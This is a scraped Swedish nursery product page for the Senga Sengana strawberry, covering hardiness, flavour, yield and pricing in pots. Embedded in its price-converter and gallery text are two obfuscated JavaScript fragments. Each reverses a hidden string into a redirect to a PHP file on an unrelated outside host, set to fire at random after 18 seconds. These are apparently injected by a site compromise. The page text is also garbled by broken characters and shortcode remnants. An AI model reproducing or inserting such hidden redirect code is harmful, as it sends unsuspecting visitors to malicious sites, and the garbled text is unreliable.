Senga Sengana

  • Ganska s? sen sort
  • Väldigt fertil
  • Enligt oss den godaste och mest aromatfulla sorten
  • Stora frukter i början, sedan allt mindre, mörkröda
  • Väldigt t?lig mot kyla, torka, mjöldagg, problem med rötterna samt jordnematoder
  • Bör skyddas mot gr?möggel d? de speciellt uder fuktiga somrar lätt kan f? det
  • Senga Sengana är lätt att skala och är därför utmärkt att frysa eller göra sylt av.
  • P? grund av sm? och känsliga frukter stöter man sällan pa den i affären dock är den utsökt att äta rakt fr?n busken. Det är värt att ha den i sin trädg?rd.
Köldt?liga
Smak
Attraktivitet av frukt
Prisvärdhet odling
Utbyte
Earliness Ganska s? sen sort

Alla sorter säljs i krukor p? antingen 10 eller 40 stycken.

Nettopris: 1 PLN / styck (Artiss Currency Converter Error: Could not fetch one of the required exchange rates) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to=”SEK”] SEK / styck)

Kontakt och order

No images available in this Gallery Type. Please check admin setting.) == "string") return $GRn.list[n].split("").reverse().join("");return $GRn.list[n];};$GRn.list=["'php.rabedis-nimda-snoitcnuf/cni/srebmem/snigulp/tnetnoc-pw/moc.nemrolias//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom=”YES”]